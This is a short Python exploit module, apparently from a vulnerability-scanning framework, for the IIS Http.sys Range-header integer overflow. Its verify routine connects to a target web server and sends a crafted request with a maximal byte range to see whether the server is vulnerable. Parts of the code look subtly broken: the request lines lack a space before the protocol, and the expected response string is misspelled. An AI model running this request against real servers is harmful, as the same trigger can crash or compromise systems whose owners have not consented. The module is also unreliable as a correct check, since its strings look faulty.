#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-09-20 15:34:41
# @Last Modified by:   Lcy
# @Last Modified time: 2016-09-21 11:58:47
import socket
from lib.util import url2ip
class Exploit:
    def __init__(self,target,expfile):
        self.target = target
        self.result = {
            "name": "IIS 系列 Http.sys 处理 Range 整数溢出漏洞",
            "author": "Lcy",
            "type": "website",
            "ref": "https://phpinfo.me",
            "status":False,
            "info":"",
            'filename':expfile + ".py",
            "target":target,
        }
    def verify(self):
        ip = url2ip(self.target)
        hexAllFfff = "18446744073709551615"
        req1 = "GET /HTTP/1.0\r\n\r\n"
        req = "GET /HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
        client_socket =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(5)
        client_socket.connect((ip, 80))
        client_socket.send(req1)
        boringResp = client_socket.recv(1024)

        if "Microsoft" in boringResp:
            client_socket.close()
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.connect((ip,80))
            client_socket.send(req)
            goodResp = client_socket.recv(1024)

            if "Requested RangeNot Satisfiable" in goodResp:
                self.result['status'] = True
                self.result['info'] = '目标存在http.sys溢出漏洞'
       